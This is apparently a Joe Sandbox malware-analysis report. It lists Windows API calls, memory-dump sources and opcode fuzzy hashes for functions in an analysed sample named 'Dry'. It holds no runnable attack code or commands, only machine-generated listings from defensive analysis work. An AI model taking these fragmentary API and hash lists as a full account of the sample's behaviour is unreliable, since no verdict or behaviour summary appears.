                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                                    • Opcode ID: fa65b85987f89e52280ae466060ace2f073d7dcec7f699c9621a4f81c17ddca7
                                                                                                                                                                                                                                                                                    • Instruction ID: 8547b0c729f6be0f9b88c6965782cc4c04c221b9ef06bbafea640629cf31c732
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa65b85987f89e52280ae466060ace2f073d7dcec7f699c9621a4f81c17ddca7
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43219036A00204AFD704EF69CC84A9EB7F5EF48341B0884A9F85AD7752CE70ED44CB90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00B1D146
                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B1D169
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B13B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B06A79,?,0000015D,?,?,?,?,00B085B0,000000FF,00000000,?,?), ref: 00B13BC5
                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B1D18F
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1D1A2
                                                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B1D1B1
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 64698b3b84f5a543e179bff72a200ad3bbce0f9a076fbcff73ab27f7fc349568
                                                                                                                                                                                                                                                                                    • Instruction ID: 95c0815911f5e32e7ec5ee7d5d25cfd43cd4f39b84d61070fbaec4301872c80e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64698b3b84f5a543e179bff72a200ad3bbce0f9a076fbcff73ab27f7fc349568
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F601D4736056157F332127769C8CDBB6AFDDEC2BA139501A9FC08E7244EE608D9181B0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _memcmp
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2931989736-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ba308fd3fc44ca1de4ab0a6a8a20d8eb6aa8e908d471dbee61752eb038141874
                                                                                                                                                                                                                                                                                    • Instruction ID: d8a70efdb3795e825191a65e3386b15de498ca3e8da1432ad94dd4b07c4afc46
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba308fd3fc44ca1de4ab0a6a8a20d8eb6aa8e908d471dbee61752eb038141874
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3301B9E2600305BBD71476149CC2F6B73DDDE52398F0044A5FE059A351E761EE14D2A2
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(0000000A,?,?,00B0F64E,00B0545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00B13170
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B131A5
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B131CC
                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00B131D9
                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00B131E2
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                    • Opcode ID: f1a1807c782e4cbba320b46667845f24a998d313fb8a367e650db9a56b7f91a9
                                                                                                                                                                                                                                                                                    • Instruction ID: 4e72cb6c1f1560cc797278cf522e9d668d52bc043adacbf5ca2b23749b41449e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1a1807c782e4cbba320b46667845f24a998d313fb8a367e650db9a56b7f91a9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B801F9726406007B96122734AC86EEB26E9DFD1FB17A104F9F819F3191FF618BE14110
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B40831,80070057,?,?,?,00B40C4E), ref: 00B4091B
                                                                                                                                                                                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B40831,80070057,?,?), ref: 00B40936
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B40831,80070057,?,?), ref: 00B40944
                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B40831,80070057,?), ref: 00B40954
                                                                                                                                                                                                                                                                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B40831,80070057,?,?), ref: 00B40960
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3897988419-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 1ad4ffd7600f04d658ac0b111efe356fca45a5e2f7c80653b786db32017d909c
                                                                                                                                                                                                                                                                                    • Instruction ID: f5d9f999b94ed181312f090e324ac03317d524e153659b05fe31f41ae99341bd
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ad4ffd7600f04d658ac0b111efe356fca45a5e2f7c80653b786db32017d909c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5018F72610204AFEB105F59DC48B9A7AFDEF84791F144164FE09E7211DB71DE80ABA0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00B4F2AE
                                                                                                                                                                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 00B4F2BC
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00B4F2C4
                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00B4F2CE
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 00B4F30A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                                    • Opcode ID: f5ea051caf5ced6373346e74518da85e1880ea239b7ad81e56717494e33c8163
                                                                                                                                                                                                                                                                                    • Instruction ID: cb3c8d94c788570c2dcc19c6af7d89d4087c637c8d4229530edf3d9baaa07ae6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5ea051caf5ced6373346e74518da85e1880ea239b7ad81e56717494e33c8163
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C016971C0162ADBCF00AFB4E949AEEBBB8FF08710F4004A6E601B3250DF309694D7A5
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B41A60
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,00B414E7,?,?,?), ref: 00B41A6C
                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B414E7,?,?,?), ref: 00B41A7B
                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B414E7,?,?,?), ref: 00B41A82
                                                                                                                                                                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B41A99
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 842720411-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 973c8dc86a233ff2c06bb7ca963ec14eb68984a0f9c811e7ab32b84b8dd1f3a8
                                                                                                                                                                                                                                                                                    • Instruction ID: 8eec16ed750d7c5d708423d339a640e54f85e9e2b87b7ab48b7ce8b5b13d4467
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 973c8dc86a233ff2c06bb7ca963ec14eb68984a0f9c811e7ab32b84b8dd1f3a8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF0181B5601205BFDB114F68DC48D6A3BBDEF843E4B210454F949E7260DF31DD809A60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B41916
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B41922
                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B41931
                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B41938
                                                                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B4194E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e6f7367119b0f36f84e9b92436a534b14702eff805ab07489e06b12a358acab3
                                                                                                                                                                                                                                                                                    • Instruction ID: 0e7fa1789a411376ed62c9ecda65c321eb86c0659e01f751098afb5ef9d46102
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6f7367119b0f36f84e9b92436a534b14702eff805ab07489e06b12a358acab3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DF06D76600302ABDB210FA9DC5DF563BBDEF897E0F510814FA49E72A0CE70DC819A60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B41976
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B41982
                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B41991
                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B41998
                                                                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B419AE
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ba5993ff7a985b4c0fae4047b25ce309ae8f55974820eb73868c6d42ef11a5e0
                                                                                                                                                                                                                                                                                    • Instruction ID: 4b4f051ba14db772ede5ce6e60112187e0e2f6119b3703ad1310b9427d4d31d8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba5993ff7a985b4c0fae4047b25ce309ae8f55974820eb73868c6d42ef11a5e0
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32F06D75600301ABDB214FA8EC59F563BBDFF897A0F114814FA49D72A0CE70E9818A60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00B50B24,?,00B53D41,?,00000001,00B23AF4,?), ref: 00B50CCB
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00B50B24,?,00B53D41,?,00000001,00B23AF4,?), ref: 00B50CD8
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00B50B24,?,00B53D41,?,00000001,00B23AF4,?), ref: 00B50CE5
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00B50B24,?,00B53D41,?,00000001,00B23AF4,?), ref: 00B50CF2
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00B50B24,?,00B53D41,?,00000001,00B23AF4,?), ref: 00B50CFF
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00B50B24,?,00B53D41,?,00000001,00B23AF4,?), ref: 00B50D0C
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e0a4dd0718059c2bded38d7be42d31f99bfdb20722c2f659a9edc704931837da
                                                                                                                                                                                                                                                                                    • Instruction ID: 2be2b6ebf208efa03ba286fe3f13d2acf4355392bbe46e9415b7ae86d80f9afd
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e0a4dd0718059c2bded38d7be42d31f99bfdb20722c2f659a9edc704931837da
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D801D072800B458FCB30AF66D980912F6F5FF503163158ABED49652921C7B0A848CE80
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00B465BF
                                                                                                                                                                                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00B465D6
                                                                                                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 00B465EE
                                                                                                                                                                                                                                                                                    • KillTimer.USER32(?,0000040A), ref: 00B4660A
                                                                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00B46624
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                                    • Opcode ID: eabf0e62dbc7c02c20daf676fac5e86ee4edf54e1b124356e6263afc86a1e818
                                                                                                                                                                                                                                                                                    • Instruction ID: 3314cd88ab089dd4a1774ce5d841ba34402dcbf4804eabfa69b3ce5ff785fa58
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eabf0e62dbc7c02c20daf676fac5e86ee4edf54e1b124356e6263afc86a1e818
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D018630500304ABEB246F10DE4EBD67BB8FF15745F000599A58A620E1DFF5AB849A52
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1DAD2
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B12D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B1DB51,00BB1DC4,00000000,00BB1DC4,00000000,?,00B1DB78,00BB1DC4,00000007,00BB1DC4,?,00B1DF75,00BB1DC4), ref: 00B12D4E
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B12D38: GetLastError.KERNEL32(00BB1DC4,?,00B1DB51,00BB1DC4,00000000,00BB1DC4,00000000,?,00B1DB78,00BB1DC4,00000007,00BB1DC4,?,00B1DF75,00BB1DC4,00BB1DC4), ref: 00B12D60
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1DAE4
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1DAF6
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1DB08
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1DB1A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
